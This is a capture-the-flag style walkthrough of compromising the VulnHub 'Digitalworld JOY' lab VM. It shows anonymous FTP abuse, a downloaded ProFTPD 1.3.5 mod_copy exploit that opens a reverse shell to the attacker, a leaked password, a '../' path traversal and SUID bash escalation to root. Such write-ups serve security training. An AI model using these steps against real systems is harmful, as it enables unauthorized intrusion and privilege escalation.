# Digitalworld JOY ~ VulnHub

### Prerequisite

![Digitalworld JOY ~ VulnHub](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985286909/9e72443e-f765-4b15-b4ff-def2d823501d.jpeg)

Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.

    echo "192.168.72.130	joy.vhub" >> /etc/hosts

hosts file entry

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-306.png)

Okay now onto the hacking!

* * *

### Reconnaissance

As always, I started off with an NMAP scan against the machine.

    ┌──(root💀nee)-[~/boxes/vulnhub/digitalworldJOY]
    └─# nmap -Pn -sV -sC -oN initial joy.vhub 

     Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-25 04:34 EST
    Nmap scan report for joy.vhub (192.168.72.133)
    Host is up (0.000046s latency).
    Not shown: 988 closed ports
    PORT    STATE SERVICE     VERSION
    21/tcp  open  ftp         ProFTPD
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
    |_drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
    22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
    25/tcp  open  smtp        Postfix smtpd
    |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
    | ssl-cert: Subject: commonName=JOY
    | Subject Alternative Name: DNS:JOY
    | Not valid before: 2018-12-23T14:29:24
    |_Not valid after:  2028-12-20T14:29:24
    |_ssl-date: TLS randomness does not represent time
    80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
    | http-ls: Volume /
    | SIZE  TIME              FILENAME
    | -     2016-07-19 20:03  ossec/
    |_
    |_http-server-header: Apache/2.4.25 (Debian)
    |_http-title: Index of /
    110/tcp open  pop3        Dovecot pop3d
    |_pop3-capabilities: CAPA UIDL SASL AUTH-RESP-CODE PIPELINING RESP-CODES TOP STLS
    |_ssl-date: TLS randomness does not represent time
    139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    143/tcp open  imap        Dovecot imapd
    |_imap-capabilities: more IDLE ENABLE LOGINDISABLEDA0001 STARTTLS capabilities listed LITERAL+ post-login SASL-IR have ID Pre-login OK LOGIN-REFERRALS IMAP4rev1
    |_ssl-date: TLS randomness does not represent time
    445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
    465/tcp open  smtp        Postfix smtpd
    |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
    | ssl-cert: Subject: commonName=JOY
    | Subject Alternative Name: DNS:JOY
    | Not valid before: 2018-12-23T14:29:24
    |_Not valid after:  2028-12-20T14:29:24
    |_ssl-date: TLS randomness does not represent time
    587/tcp open  smtp        Postfix smtpd
    |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
    | ssl-cert: Subject: commonName=JOY
    | Subject Alternative Name: DNS:JOY
    | Not valid before: 2018-12-23T14:29:24
    |_Not valid after:  2028-12-20T14:29:24
    |_ssl-date: TLS randomness does not represent time
    993/tcp open  ssl/imaps?
    | ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
    | Not valid before: 2019-01-27T17:23:23
    |_Not valid after:  2032-10-05T17:23:23
    |_ssl-date: TLS randomness does not represent time
    995/tcp open  ssl/pop3s?
    | ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
    | Not valid before: 2019-01-27T17:23:23
    |_Not valid after:  2032-10-05T17:23:23
    |_ssl-date: TLS randomness does not represent time
    MAC Address: 00:0C:29:04:EF:C6 (VMware)
    Service Info: Hosts: The,  JOY.localdomain, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Host script results:
    |_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
    |_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | smb-os-discovery: 
    |   OS: Windows 6.1 (Samba 4.5.16-Debian)
    |   Computer name: joy
    |   NetBIOS computer name: JOY\x00
    |   Domain name: \x00
    |   FQDN: joy
    |_  System time: 2021-02-25T17:34:41+08:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2021-02-25T09:34:41
    |_  start_date: N/A

### Scanning & Enumeration

Based on the scan that was run, I realized that port 21 was running a FTP server and allowed anonymous users to connect and interact.

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-307.png)

I then executed the following command to dump the whole anon root to my local system:

    wget -m ftp://anonymous:anonymous@joy.vhub

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-308.png)

In the downloaded directory was a text file which revealed the directory listing of the user `patrick`. In there was an interesting file named `version_control`

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-309.png)

I then used the unsecured FTP server to copy this file from the user `patrick`'s home directory to the anon root's ftp directory. By this way I could view it locally without having access to the machine.

    site cpft <from>
    site cpto <to>

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-310.png)

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-311.png)

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-312.png)

version\_control

This file revealed that the machine was running `ProFTPd: 1.3.5`. After digging the net for awhile, I found [this](https://github.com/thegingerninja/ProFTPd_1_3_5_mod_copy_exploit/blob/master/exploit_proftd_1_3_5.py) RCE exploit on github for this particular version of `ProFTPd`.

### Exploitation

    ┌──(root💀nee)-[~/boxes/vulnhub/digitalworldJOY]
    └─# wget https://raw.githubusercontent.com/thegingerninja/ProFTPd_1_3_5_mod_copy_exploit/master/exploit_proftd_1_3_5.py
    
    ┌──(root💀nee)-[~/boxes/vulnhub/digitalworldJOY]
    └─# ./exploit_proftd_1_3_5.py <target IP> <Target web dir> <Local IP> <Local Port>

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-313.png)

I then caught the incoming shell with a netcat listener.

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-314.png)

### Lateral Movement

I then ran `linpeas.sh` as always which revealed an interesting file in the web directory.

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-315.png)

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-316.png)

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-317.png)

Accessing this file gave me access to user `patrick`'s credentials but not root.

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-318.png)

    patrick:apollo098765

### Privilege Escalation

I first ran `sudo -l` to check for any binaries that the user `patrick` was authorized to run as root.

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-319.png)

This revealed that `patrick` could run this one binary `test` with sudo perms.

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-320.png)

The binary seemed to be some sort of application which can be used to change perms of files. My theory was to set sticky \[SUID\] bit on the bash binary and exploit the `-p` option that bash had. [Read More](https://gtfobins.github.io/gtfobins/bash/)

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-322.png)

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-321.png)

I then ran the application and when prompted for the file name in "this directory", I specified `../../../../../bin/bash`. This would ensure that I climb out of "this directory"

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-323.png)

Lastly, I ran `/bin/bash -p` and gained root access to the machine~!

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-324.png)

![Digitalworld JOY ~ VulnHub](/content/images/2021/02/image-325.png)

ROOTY!
